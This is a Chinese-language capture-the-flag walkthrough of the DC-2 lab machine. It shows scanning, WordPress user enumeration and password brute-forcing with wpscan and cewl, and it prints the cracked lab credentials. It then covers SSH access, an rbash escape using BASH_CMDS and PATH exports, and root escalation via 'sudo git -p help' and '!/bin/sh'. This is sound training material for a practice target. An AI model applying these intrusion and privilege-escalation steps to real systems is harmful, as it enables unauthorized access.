信息收集
靶机扫描
nmap 192.168.93.1/24
端口扫描
网页访问
发现访问不到,根据显示考虑IP未遵循重定向到域名
在本机的C:\Windows\System32\drivers\etc 修改hosts⽂件,添加192.168.93.136 dc-2
再次进行访问,可以访问到
点击flag,出现以下页面
指纹识别发现CMS是wordpress
whatweb http://192.168.93.136也可以扫描CMS
进行目录扫描
在后面拼接/wp-admin
使⽤wpscan⼯具枚举⽤户
wpscan --url http://dc-2 --enumerate u
发现了三个相关的用户名admin,jerry,tom 接下来就是密码,使用了Cewl工具
cewl http://dc-2/ > 1.txt
wpscan --url http://dc-2 --passwords 1.txt
获得账号密码
Username: jerry, Password: adipiscing Username: tom, Password: parturient
进行登录
发现第二个flag
flag2提示我们可以走另一个入口,让我想到了ssh
ssh tom@192.168.93.136 -p 7744
发现登录上了,进行权限查看,发现有rbash限制。有一些命令不能使用,发现echo命令export命令可以使用,我们使用echo命令查看一下系统命令还有啥能用。
echo $PATH
echo /home/tom/usr/bin/*
发现less,ls,scp,vi命令还是可以使用的,查找如何将rbash限制进行绕过,可以使用一下命令进行绕过。
# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a # 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
发现已经绕过入了,发现了第三个flag,查看一下flag3.txt。
flag3提示我们su,我感觉是要我们切换到另一个用户,在tom用户下切换到jerry用户,并查询一下用户下所有相关flag的文件
su jerry
adipiscing
find / -name *flag*
发现了falg4.txt,打开查看
cd /home/jerry/
ls
cat cat flag4.txt
提权
尝试sudo提权
sudo -l
sudo git -p help config
!/bin/sh
id
cd /root
ls
cat final-flag.txt